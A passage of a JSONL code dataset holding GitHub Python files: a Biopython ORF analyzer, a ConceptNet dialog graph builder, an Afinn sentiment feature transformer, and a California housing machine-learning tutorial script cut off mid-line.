"collections.defaultdict", "line_number": 1286, "usage_type": "call"}, {"api_name": "django.db.models.get_models", "line_number": 1375, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1421, "usage_type": "call"}, {"api_name": "flash.settings.DEFAULT_TIMEOUT", "line_number": 1424, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 1424, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 1426, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 1489, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 1490, "usage_type": "argument"}, {"api_name": "loader.object_or_none", "line_number": 1526, "usage_type": "call"}, {"api_name": "loader.object_or_404", "line_number": 1530, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 1593, "usage_type": "call"}]}
+{"seq_id": "6290291944", "text": "from Bio.Alphabet import DNAAlphabet\nfrom Bio.Data.CodonTable import CodonTable, TranslationError, ambiguous_dna_by_id\nfrom Bio.Seq import Seq\nfrom Bio.SeqFeature import SeqFeature, ExactPosition\nfrom Bio.SeqRecord import SeqRecord\n\nfrom src.Base import Base\n\n__author__ = \"ronmor\"\n\n\ndef _cleave_after_stop_codon(nucleotide_seq, table):\n \"\"\"\n :param nucleotide_seq: The DNA sequence to cleave\n :type nucleotide_seq: Seq\n :param table:\n :type table: CodonTable\n :return:\n :rtype: list[Seq]\n :raises: ValueError if not a nucleotide sequence\n \"\"\"\n _check_if_nucleotide_sequence(nucleotide_seq)\n nucleotide_seq = nucleotide_seq.upper()\n stop_codons = table.stop_codons\n cleaved_at_stop = []\n codon = \"\"\n after_stop_index = 0\n for index, letter in enumerate(nucleotide_seq):\n codon += letter\n if codon in stop_codons:\n cleaved_at_stop.append(nucleotide_seq[after_stop_index:index + 1])\n after_stop_index = index + 1\n if len(codon) == 3:\n codon = \"\"\n return cleaved_at_stop\n\n\ndef _check_if_nucleotide_sequence(nucleotide_sequence):\n if not isinstance(nucleotide_sequence, Seq):\n raise ValueError(\"Expected a sequence, got %s instead\" % type(nucleotide_sequence))\n elif not isinstance(nucleotide_sequence.alphabet, DNAAlphabet):\n raise ValueError(\"Expected DNA alphabet, found %s instead\" % type(nucleotide_sequence.alphabet))\n\n\nclass DownstreamAnalyzer(object):\n def __init__(self, downstream_sequence, coding_sequence_start_index, genbank_file, is_complementary=False):\n \"\"\"\n :param downstream_sequence: The sequence downstream of the a gene which we want to analyze.\n :type downstream_sequence: Seq\n :param coding_sequence_start_index: The start index of the gene in the genbank-file features list.\n :type coding_sequence_start_index: int\n :param genbank_file:\n :type genbank_file: SeqRecord\n :param is_complementary:\n :type is_complementary: bool\n :raise: ValueError if the object doesn't hold a genbank documentation or if the genbank file isn't DNA\n \"\"\"\n self.__downstream_seq = downstream_sequence\n self.__start_index = coding_sequence_start_index\n self. __is_complementing = is_complementary\n if genbank_file is not None:\n if not isinstance(genbank_file, SeqRecord):\n raise ValueError(\n \"genbank file type expected to be of type SeqRecord, found %s instead\" % type(self.__genbank_file))\n _check_if_nucleotide_sequence(genbank_file.seq)\n self.__genbank_file = genbank_file\n\n @property\n def downstream_seq(self):\n return self.__downstream_seq\n\n @property\n def is_complementing(self):\n return self.__is_complementing\n\n def find_possible_proteins_in_downstream_sequence(self, table_id=11):\n \"\"\"\n For the downstream sequence, get all possible CDSs and return their matching proteins.\n ORF is searched for the entire sequence and not for the complement strand (3 total).\n Use only for sequences known not to have introns!\n :param table_id: ID of translation table as appears on https://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi\n Defaults to 11.\n :type table_id: int\n :return: ORF index (0-2) to list of proteins (type Seq)\n :rtype: dict[int, list[Seq]]\n \"\"\"\n table = ambiguous_dna_by_id[table_id]\n orfs = self._find_possible_orfs_on_positive_strand(self.__downstream_seq)\n possible_proteins = {}\n for orf_num, orf in enumerate(orfs):\n cleaved_frame = _cleave_after_stop_codon(orf, table)\n for possible_cds in cleaved_frame:\n try:\n possible_protein = possible_cds.translate(table=table, cds=True)\n except TranslationError:\n continue\n else:\n possible_proteins[orf_num] = possible_protein\n return possible_proteins\n\n @staticmethod\n def _find_possible_orfs_on_positive_strand(nucleotide_sequence):\n \"\"\"\n Only find the orfs in the downstream sequence given, WITHOUT the complementing strand.\n :param nucleotide_sequence: the sequence to find the\n :rtype: [Seq]\n :return:\n \"\"\"\n for frame in range(3):\n length = 3 * ((len(nucleotide_sequence) - frame) // 3) # Multiple of three\n yield nucleotide_sequence[frame:frame + length]\n\n def _find_next_gene_index_in_genbank(self):\n \"\"\"\n :return:\n :rtype: int\n \"\"\"\n feature = None\n for feature in self.__genbank_file.features:\n if feature.location.start >= self.__start_index:\n break\n index = self.__genbank_file.features.index(feature) - 1 if feature else None\n if self.__is_complementing:\n return index\n elif index is not None:\n try:\n while self.__start_index < self.__genbank_file.features[index].location.start:\n index += 1\n # End of list\n except IndexError:\n index -= 1\n return index\n\n def generate_downstream_cdss(self):\n \"\"\"\n find all the features (usually CDSs) downstream of the gene, going towards the 3' end in both strands.\n :return:\n \"\"\"\n next_feature_index = self._find_next_gene_index_in_genbank()\n if next_feature_index is None:\n raise ValueError(\"Could not find a feature downstream\")\n downstream_feature_index = next_feature_index\n while abs(self.__genbank_file.features[downstream_feature_index].location.start -\n self.__genbank_file.features[next_feature_index].location.start) <= len(self.__downstream_seq):\n if not (self.__genbank_file.features[downstream_feature_index].strand == Base.COMPLEMENT\n and not self.__is_complementing):\n feature_to_yield = self.__genbank_file.features[downstream_feature_index]\n if hasattr(feature_to_yield, 'type') and feature_to_yield.type == 'CDS' and \\\n isinstance(feature_to_yield.location.start, ExactPosition) and \\\n isinstance(feature_to_yield.location.end, ExactPosition):\n yield feature_to_yield\n if self.__is_complementing:\n downstream_feature_index -= 1\n else:\n downstream_feature_index += 1\n if downstream_feature_index < 0 or downstream_feature_index > len(self.__genbank_file.features)-1:\n break\n\n def translate_feature(self, feature, table=11):\n \"\"\"\n :param feature: a feature of a genome. has to be RNA or DNA\n :type feature: SeqFeature\n :param table: The table used for translation: https://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi\n :type table: int\n :rtype: Seq\n \"\"\"\n is_cds = True if feature.type == 'CDS' else False\n return feature.extract(self.__genbank_file).seq.translate(table=table, cds=is_cds)\n\n def __eq__(self, other):\n if not isinstance(other, type(self)):\n raise ValueError(\"Expected instance of %s got %s instead\" % (type(self), type(other)))\n return self.__downstream_seq == other.downstream_seq\n", "repo_name": "ronmoran/weizmann-aimr", "sub_path": "src/DownstreamAnalyzer.py", "file_name": "DownstreamAnalyzer.py", "file_ext": "py", "file_size_in_byte": 7434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.Seq.Seq", "line_number": 39, "usage_type": "argument"}, {"api_name": "Bio.Alphabet.DNAAlphabet", "line_number": 41, "usage_type": "argument"}, {"api_name": "Bio.SeqRecord.SeqRecord", "line_number": 62, "usage_type": "argument"}, {"api_name": "Bio.Data.CodonTable.ambiguous_dna_by_id", "line_number": 87, "usage_type": "name"}, {"api_name": "Bio.Data.CodonTable.TranslationError", "line_number": 95, "usage_type": "name"}, {"api_name": "src.Base.Base.COMPLEMENT", "line_number": 145, "usage_type": "attribute"}, {"api_name": "src.Base.Base", "line_number": 145, "usage_type": "name"}, {"api_name": "Bio.SeqFeature.ExactPosition", "line_number": 149, "usage_type": "argument"}, {"api_name": "Bio.SeqFeature.ExactPosition", "line_number": 150, "usage_type": "argument"}]}
+{"seq_id": "8258637633", "text": "import torch\nimport numpy as np\nimport os\nimport pickle\n\nfrom tqdm import tqdm\nfrom datasets import load_dataset\nfrom sentence_transformers import SentenceTransformer\n\nfrom message_enritcher.trie_structure import Trie\nfrom message_enritcher.knowledge_extractor import KnowledgeExtractor\n\nclass GraphBuilder:\n def __init__(self,\n path='/data/conceptNet_embs',\n save_path='datasets/',\n emb_file_name='conceptnet_embs',\n data_file_name='dialogs_data'):\n self.path = path\n self.save_path = save_path\n self.data_file_name = data_file_name\n self.emb_file_name = emb_file_name\n self.embeddings = None\n self.trie = None\n self.dataset = None\n self.conceptNet = None\n self.start_index = None\n self.set_dataset()\n self.set_embeddings()\n self.set_trie()\n self.set_start_index()\n self.preprocess_dialog_data()\n\n def set_dataset(self):\n print(\"load and save dataset\")\n dataset = load_dataset(\"daily_dialog\")\n self.train_dataset = dataset['train']['dialog']\n self.test_dataset = dataset['test']['dialog']\n self.val_dataset = dataset['validation']['dialog']\n conceptNet = load_dataset(\"peandrew/conceptnet_en_nomalized\")\n self.conceptNet = conceptNet['train']\n\n def preprocess_dialog_data(self):\n for i, conv in enumerate(self.train_dataset):\n for j, msg in enumerate(conv):\n self.train_dataset[i][j] = msg.strip()\n self.train_dataset = [data[:10] for data in self.train_dataset if len(data) > 4]\n\n for i, conv in enumerate(self.test_dataset):\n for j, msg in enumerate(conv):\n self.test_dataset[i][j] = msg.strip()\n self.test_dataset = [data[:10] for data in self.test_dataset if len(data) > 4]\n\n for i, conv in enumerate(self.val_dataset):\n for j, msg in enumerate(conv):\n self.val_dataset[i][j] = msg.strip()\n self.val_dataset = [data[:10] for data in self.val_dataset if len(data) > 4]\n\n def set_embeddings(self):\n print(\"load and save embeddings\")\n self.embeddings = self.get_embeddings()\n\n def set_trie(self):\n print(\"build trie datastructure\")\n self.trie = Trie()\n self.trie.insert_dataset(self.conceptNet, self.get_embeddings())\n del self.conceptNet\n del self.embeddings\n\n def get_embeddings(self, numpy_array=True):\n try:\n embeddings = self.load_tensor(file_name=self.emb_file_name, path=self.path)\n except:\n print(\"no saved embeddings could be found\")\n dataset = load_dataset(\"peandrew/conceptnet_en_nomalized\")\n model = SentenceTransformer('all-MiniLM-L6-v2')\n embeddings = model.encode(dataset['train']['arg2'])\n self.save_tensor(embeddings, file_name=self.emb_file_name, path=self.path)\n if numpy_array:\n embeddings = embeddings.cpu().detach().numpy()\n return embeddings\n\n def load_tensor(self, file_name, path):\n f = os.path.join(path, f\"{file_name}.pt\")\n return torch.load(f)\n\n def save_tensor(self, tensor, file_name, path):\n if not torch.is_tensor(tensor):\n tensor = torch.from_numpy(tensor)\n f = os.path.join(path, f\"{file_name}.pt\")\n torch.save(tensor, f)\n\n def set_start_index(self):\n print(\"load index\")\n file_list = os.listdir(self.path)\n max_end = 0\n try:\n for file_name in file_list:\n if self.data_file_name in file_name:\n f = file_name.split('_')[-1]\n start, end = f.split('-')\n end = int(end[:-2])\n max_end = max(end, max_end)\n except:\n print(f\"could not find a file that contains this {self.data_file_name} string\")\n self.start_index = max_end\n\n def from_dialog_to_graph(self,\n start_index,\n n_hops=4,\n save_data=False,\n save_steps=100,\n coll_nodes_hop=100,\n num_persons=2):\n\n save_folder_name = f'dd_hop{n_hops}_k{coll_nodes_hop}/'\n\n all_person_list = ['Max', 'Eva', 'Mareike', 'Sebastian', 'Holga']\n dialogs = []\n new_data = True\n datasets = [0, 1, 2]\n\n for data_idx in datasets:\n if data_idx == 0:\n dataset = self.test_dataset\n folder_name = \"test/data/raw/\"\n data_filename = 'test_data'\n elif data_idx == 1:\n dataset = self.val_dataset\n folder_name = \"val/data/raw/\"\n data_filename = 'val_data'\n else:\n dataset = self.train_dataset\n folder_name = \"train/data/raw/\"\n data_filename = 'train_data'\n\n end_index = len(dataset)\n start = start_index\n\n for index, conv in tqdm(enumerate(dataset[start_index:end_index], start=start_index),\n total=end_index - start_index):\n new_data = True\n person_list = np.char.array([all_person_list[person % num_persons] for person in range(len(conv))])\n person_msg_relations = np.char.array(['speak by' for _ in range(len(conv))])\n person_msg_edges = np.char.array([person_list, conv, person_msg_relations]).T\n\n message_subgrphs = []\n for i, msg in enumerate(conv):\n message_edges = {}\n msg_sub = KnowledgeExtractor(msg, self.trie, i % num_persons)\n for hop in range(n_hops):\n ex_nodes = msg_sub.new_hop(k=coll_nodes_hop)\n if ex_nodes == 0:\n break\n\n message_edges['person_msg'] = person_msg_edges[i]\n message_edges['msg_knowledge'] = msg_sub.data['msg_knowledge_edges']\n message_edges['knowledge_knowledge'] = msg_sub.graph_edges\n\n message_subgrphs.append(message_edges)\n\n dialogs.append(message_subgrphs)\n if save_data:\n if len(dialogs) >= save_steps:\n pickle.dump(dialogs, open(\n f\"{self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\",\n \"wb\"))\n start = index + 1\n del dialogs\n dialogs = []\n new_data = False\n if save_data and new_data:\n pickle.dump(dialogs,\n open(f\"{self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\",\n \"wb\"))\n del dialogs\n dialogs = []\n new_data = False\n print(\n f\"save file: \\t {data_filename}_{start}-{index}.p to: \\t {self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\")", "repo_name": "ShiraTUB/ActiveDoc", "sub_path": "DiaTransNet/data/graph_builder.py", "file_name": "graph_builder.py", "file_ext": "py", "file_size_in_byte": 7270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datasets.load_dataset", "line_number": 36, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 40, "usage_type": "call"}, {"api_name": "message_enritcher.trie_structure.Trie", "line_number": 65, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 75, "usage_type": "call"}, {"api_name": "sentence_transformers.SentenceTransformer", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 91, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 95, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.char.array", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.char.array", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.char.array", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 145, "usage_type": "attribute"}, {"api_name": "message_enritcher.knowledge_extractor.KnowledgeExtractor", "line_number": 150, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 165, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 173, "usage_type": "call"}]}
+{"seq_id": "3665822992", "text": "from sklearn.base import TransformerMixin, BaseEstimator\nfrom sklearn.preprocessing import MinMaxScaler\nfrom nltk.tokenize import word_tokenize\nfrom utils.Parameters import Parameters\nimport numpy as np\nfrom pymongo import MongoClient\nparameters = Parameters()\nfrom afinn import Afinn\n\n\nafinn = Afinn()\n\n\"\"\"\nconfigs:\n0- No feature\n1- sentence polarity TODO:(needs parameterization )\n2- num_polarity_words / num_neutral_words\n3- mean_pos mean_neg\n4- median_pos median_neg\n\"\"\"\n\n\nclass AfinnTransformer(TransformerMixin, BaseEstimator):\n features = {'afinn_value': 0, 'polar_neutral_ratio': 0 }\n\n def __init__(self, featureSetConfiguration = 1 ):\n self.featureSetConfiguration = featureSetConfiguration\n\n def transform(self, X, **transform_params):\n\n mongoClient = MongoClient('localhost', 27017)\n ffCorpus = mongoClient.FACTFEELCorpus\n temp = [\n [0 for f in sorted(AfinnTransformer.features.keys())]\n for s in X\n ]\n # document_score\n if self.featureSetConfiguration == 1:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument= documentCollection.find_one({'document_id': document })\n raw_documet = currentDocument['raw'].lower()\n b = afinn.score(raw_documet)\n features_to_set['afinn_value'] = b\n\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n min_max_scaler = MinMaxScaler()\n temp = min_max_scaler.fit_transform(temp)\n # num_polarity_words / num_neutral_words\n elif self.featureSetConfiguration == 2:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument = documentCollection.find_one({'document_id': document})\n raw_document = currentDocument['raw'].lower()\n\n words = word_tokenize(raw_document)\n scores_list = [afinn.score(word) for word in words]\n\n neutral = [zero for zero in scores_list if zero==0]\n polar = [pol for pol in scores_list if pol != 0]\n\n if(neutral !=[] and polar!=[]):\n b = len(polar)/len(neutral)\n else:\n b = 0\n features_to_set['polar_neutral_ratio'] = b\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n # mean_pos mean_neg\n elif self.featureSetConfiguration == 3:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument= documentCollection.find_one({'document_id': document })\n raw_document = currentDocument['raw'].lower()\n\n words = word_tokenize(raw_document)\n scores_list = [afinn.score(word) for word in words]\n\n neutral = [zero for zero in scores_list if zero==0]\n polar = [pol for pol in scores_list if pol != 0]\n\n if(neutral !=[] and polar!=[]):\n b_r = len(polar)/len(neutral)\n else:\n b_r=0\n\n b_a = afinn.score(raw_document)\n features_to_set['afinn_value'] = b_a\n features_to_set['polar_neutral_ratio'] = b_r\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n\n min_max_scaler = MinMaxScaler()\n temp = min_max_scaler.fit_transform(temp)\n # median_pos median_neg\n elif self.featureSetConfiguration == 4:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = {'polar/neutral': 0}\n\n mongoClient.close()\n features = np.array(temp)\n #print('AfinnTransformer:' , self.featureSetConfiguration,' ### X:',len(X),'len(features):',len(features))\n return features\n\n def fit(self, X, y=None, **fit_params):\n return self\n\n ## names are related to featureSetConfiguration\n def get_feature_names(self):\n return sorted(AfinnTransformer.features.keys())\n\n\n\n\n\n\n", "repo_name": "ei08047/ArgTasks", "sub_path": "ArgMine/ffd_en/Transformers/AfinnTransformer.py", "file_name": "AfinnTransformer.py", "file_ext": "py", "file_size_in_byte": 4616, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.Parameters.Parameters", "line_number": 7, "usage_type": "call"}, {"api_name": "afinn.Afinn", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.base.TransformerMixin", "line_number": 23, "usage_type": "name"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 23, "usage_type": "name"}, {"api_name": "pymongo.MongoClient", "line_number": 31, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 50, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 62, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 84, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 85, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}]}
+{"seq_id": "18815876090", "text": "from __future__ import division, print_function, unicode_literals\n\nimport os\nimport tarfile\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom six.moves import urllib\nfrom future_encoders import ColumnTransformer, OneHotEncoder\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.model_selection import StratifiedShuffleSplit, train_test_split, cross_val_score, GridSearchCV\nfrom sklearn.pipeline import FeatureUnion, Pipeline\nfrom sklearn.preprocessing import LabelEncoder, LabelBinarizer, StandardScaler, Imputer\nfrom sklearn.ensemble import RandomForestRegressor\n\nwarnings.filterwarnings(action=\"ignore\", message=\"^internal gelsd\")\n\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 2000)\n\nnp.random.seed(42)\n\nplt.rcParams['axes.labelsize'] = 14\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\nrooms_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6\n\n\nclass CombinedAttributesAdder(BaseEstimator, TransformerMixin):\n def __init__(self, add_bedrooms_per_room=True): # no *args or **kargs\n self.add_bedrooms_per_room = add_bedrooms_per_room\n\n def fit(self, X, y=None):\n return self # nothing else to do\n\n def transform(self, X, y=None):\n rooms_per_household = X[:, rooms_ix] / X[:, household_ix]\n population_per_household = X[:, population_ix] / X[:, household_ix]\n if self.add_bedrooms_per_room:\n bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\n return np.c_[X, rooms_per_household, population_per_household,\n bedrooms_per_room]\n else:\n return np.c_[X, rooms_per_household, population_per_household]\n\n\n# class DataFrameSelector(BaseEstimator, TransformerMixin):\n# def __init__(self, attribute_names):\n# self.attribute_names = attribute_names\n#\n# def fit(self, X, y=None):\n# return self\n#\n# def transform(self, X):\n# return X[self.attribute_names].values\n\n\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"end_to_end_project\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\n\nDOWNLOAD_ROOT = \"https://raw.githubusercontent.com/ageron/handson-ml/master/\"\nHOUSING_PATH = \"datasets/housing\"\nHOUSING_URL = DOWNLOAD_ROOT + HOUSING_PATH + \"/housing.tgz\"\n\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\n\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n if not os.path.isdir(housing_path):\n os.makedirs(housing_path)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n\n\ndef load_housing_data(housing_path=HOUSING_PATH):\n csv_path = os.path.join(housing_path, \"housing.csv\")\n return pd.read_csv(csv_path)\n\n\ndef income_cat_proportions(data):\n return data[\"income_cat\"].value_counts() / len(data)\n\n\ndef display_scores(scores):\n print(\"Scores:\", scores)\n print(\"Mean:\", scores.mean())\n print(\"Standard deviation:\", scores.std())\n\n\nhousing = load_housing_data()\n\nprint(housing.head(30))\nprint(housing.info())\nprint(housing[\"ocean_proximity\"].value_counts())\nprint(housing.describe())\n\nhousing[\"income_cat\"] = np.ceil(housing[\"median_income\"] / 1.5)\nhousing[\"income_cat\"].where(housing[\"income_cat\"] < 5, 5.0, inplace=True)\n\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\nfor train_index, test_index in split.split(housing, housing[\"income_cat\"]):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]\n\nprint(strat_test_set[\"income_cat\"].value_counts() / len(strat_test_set))\nprint(housing[\"income_cat\"].value_counts() / len(housing))\n\ntrain_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)\n\ncompare_props = pd.DataFrame({\n \"Overall\": income_cat_proportions(housing),\n \"Stratified\": income_cat_proportions(strat_test_set),\n \"Random\": income_cat_proportions(test_set),\n}).sort_index()\ncompare_props[\"Rand. %error\"] = 100 * compare_props[\"Random\"] / compare_props[\"Overall\"] - 100\ncompare_props[\"Strat. %error\"] = 100 * compare_props[\"Stratified\"] / compare_props[\"Overall\"] - 100\nprint(compare_props)\n\nfor set_ in (strat_train_set, strat_test_set):\n set_.drop([\"income_cat\"], axis=1, inplace=True)\n\n# visualizando os dados\n\nhousing = strat_train_set.copy()\n\n# california_img = mpimg.imread(PROJECT_ROOT_DIR + '/images/end_to_end_project/california.png')\n# ax = housing.plot(kind=\"scatter\", x=\"longitude\", y=\"latitude\", figsize=(10,7),\n# s=housing['population']/100, label=\"Population\",\n# c=\"median_house_value\", cmap=plt.get_cmap(\"jet\"),\n# colorbar=False, alpha=0.4,\n# )\n# plt.imshow(california_img, extent=[-124.55, -113.80, 32.45, 42.05], alpha=0.5,\n# cmap=plt.get_cmap(\"jet\"))\n# plt.ylabel(\"Latitude\", fontsize=14)\n# plt.xlabel(\"Longitude\", fontsize=14)\n#\n# prices = housing[\"median_house_value\"]\n# tick_values = np.linspace(prices.min(), prices.max(), 11)\n# cbar = plt.colorbar()\n# cbar.ax.set_yticklabels([\"$%dk\"%(round(v/1000)) for v in tick_values], fontsize=14)\n# cbar.set_label('Median House Value', fontsize=16)\n#\n# plt.legend(fontsize=16)\n# save_fig(\"california_housing_prices_plot\")\n# plt.show()\n\ncorr_matrix = housing.corr()\nprint(corr_matrix[\"median_house_value\"].sort_values(ascending=False))\n\n# attributes = [\"median_house_value\", \"median_income\", \"total_rooms\",\n# \"housing_median_age\"]\n# scatter_matrix(housing[attributes], figsize=(12, 8))\n# save_fig(\"scatter_matrix_plot\")\n\nhousing[\"rooms_per_household\"] = housing[\"total_rooms\"] / housing[\"households\"]\nhousing[\"bedrooms_per_room\"] = housing[\"total_bedrooms\"] / housing[\"total_rooms\"]\nhousing[\"population_per_household\"] = housing[\"population\"] / housing[\"households\"]\n\ncorr_matrix = housing.corr()\ncorr_matrix[\"median_house_value\"].sort_values(ascending=False)\n\n# preparando para machine learning\nhousing = strat_train_set.drop(\"median_house_value\", axis=1)\nhousing_labels = strat_train_set[\"median_house_value\"].copy()\n\nhousing.dropna(subset=[\"total_bedrooms\"]) # remove as linhas que contêm valores nulos\nhousing.drop(\"total_bedrooms\", axis=1) # remove a coluna inteira\nmedian = housing[\"total_bedrooms\"].median()\nhousing[\"total_bedrooms\"].fillna(median) # substitui os valores nulos pela mediana\n\nimputer = Imputer(strategy=\"median\")\nhousing_num = housing.drop(\"ocean_proximity\", axis=1) # remover atributos não numéricos\nimputer.fit(housing_num) # usar sklearn para completar os valores nulos com a mediana\nprint(imputer.statistics_)\n\nX = imputer.transform(housing_num)\nhousing_tr = pd.DataFrame(X, columns=housing_num.columns)\n\nencoder = LabelEncoder() # pŕoblema que os algoritmos de ml acham que categorias mais próximas são similares\nhousing_cat = housing[\"ocean_proximity\"]\nhousing_cat_encoded = encoder.fit_transform(housing_cat)\nprint(housing_cat_encoded)\n\nencoder = OneHotEncoder()\nhousing_cat_1hot = encoder.fit_transform(housing_cat_encoded.reshape(-1, 1))\nprint(housing_cat_1hot)\n\nencoder = LabelBinarizer()\nhousing_cat_1hot = encoder.fit_transform(housing_cat)\nprint(housing_cat_1hot)\n\nattr_adder = CombinedAttributesAdder(add_bedrooms_per_room=False)\nhousing_extra_attribs = attr_adder.transform(housing.values)\n\nhousing_extra_attribs = pd.DataFrame(\n housing_extra_attribs,\n columns=list(housing.columns)+[\"rooms_per_household\", \"population_per_household\"])\nprint(housing_extra_attribs.head())\n\nnum_attribs = list(housing_num)\ncat_attribs = [\"ocean_proximity\"]\n\nnum_pipeline = Pipeline([\n # ('selector', DataFrameSelector(num_attribs)),\n ('imputer', Imputer(strategy=\"median\")),\n ('attribs_adder', CombinedAttributesAdder()),\n ('std_scaler', StandardScaler()),\n ])\n\n# cat_pipeline = Pipeline([\n# ('selector', DataFrameSelector(cat_attribs)),\n# ('cat_encoder', OneHotEncoder()),\n# ])\n\nfull_pipeline = ColumnTransformer([\n (\"num\", num_pipeline, num_attribs),\n (\"cat\", OneHotEncoder(), cat_attribs),\n ])\n\nhousing_prepared = full_pipeline.fit_transform(housing)\nprint(housing_prepared)\nprint(housing_prepared.shape)\n\n# Trainando o modelo\nlin_reg = LinearRegression()\nlin_reg.fit(housing_prepared, housing_labels)\n\nsome_data = housing.iloc[:5]\nsome_labels = housing_labels.iloc[:5]\nsome_data_prepared = full_pipeline.transform(some_data)\nprint(\"Predictions:\\t\", lin_reg.predict(some_data_prepared))\nprint(\"Labels:\\t\\t\", list(some_labels))\n\nhousing_predictions = lin_reg.predict(housing_prepared)\nlin_mse = mean_squared_error(housing_labels, housing_predictions)\nlin_rmse = np.sqrt(lin_mse)\nprint(lin_rmse)\n\ntree_reg = DecisionTreeRegressor()\ntree_reg.fit(housing_prepared, housing_labels)\nhousing_predictions = tree_reg.predict(housing_prepared)\ntree_mse = mean_squared_error(housing_labels, housing_predictions)\ntree_rmse = np.sqrt(tree_mse)\nprint(tree_rmse)\n\nscores = cross_val_score(tree_reg, housing_prepared, housing_labels, scoring='neg_mean_squared_error', cv=10)\nrmse_scores = np.sqrt(-scores)\ndisplay_scores(rmse_scores)\n\nforest_reg = RandomForestRegressor()\nforest_reg.fit(housing_prepared, housing_labels)\nhousing_predictions = forest_reg.predict(housing_prepared)\nforest_mse = mean_squared_error(housing_labels, housing_predictions)\nforest_rmse = np.sqrt(forest_mse)\nprint(forest_rmse)\nscores = cross_val_score(forest_reg, housing_prepared, housing_labels, scoring='neg_mean_squared_error', cv=10)\nrmse_scores = np.sqrt(-scores)\ndisplay_scores(rmse_scores)\n\nparam_grid = [\n {'n_estimators': [3, 10, 30, 40, 50], 'max_features': [2, 4, 5, 6, 7, 8]},\n {'bootstrap': [False], 'n_estimators': [3, 